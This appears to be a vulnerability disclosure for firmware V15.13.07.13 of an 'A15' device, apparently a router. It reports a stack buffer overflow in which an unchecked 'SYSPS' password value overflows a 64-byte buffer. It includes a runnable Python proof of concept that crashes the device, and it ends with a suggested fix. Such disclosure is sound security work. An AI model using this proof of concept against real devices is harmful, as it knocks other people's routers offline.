We found a stack buffer overflow vulnerability at **A15 (**Firmware version V15.13.07.13).
In the handler function for action /goform/SysToolChangePwd, the user-controlled string “SYSPS” is stored into “sys.userpass” via SetValue.
Then the string is loaded into stack buffer pwd at /goform/hasLoginPwd. Because the length of “SYSPS” is not checked, the buffer can be overflowed if the length is larger than 64.
import requests
cookie = {"Cookie":"uid=1234"}
url1 = "<http://192.168.17.221:80/goform/SysToolChangePwd>"
data1 = {"SYSPS" : "a"*(0x80)}
response = requests.post(url1, cookies=cookie, data=data1)
url2 = "<http://192.168.17.221:80/goform/hasLoginPwd>"
data2 = {}
response = requests.post(url2, cookies=cookie, data=data2)
print(response.text)
print(response)
After executing the router will crash due to buffer overflow.
GetValue function should accept a length argument to avoid buffer overflow.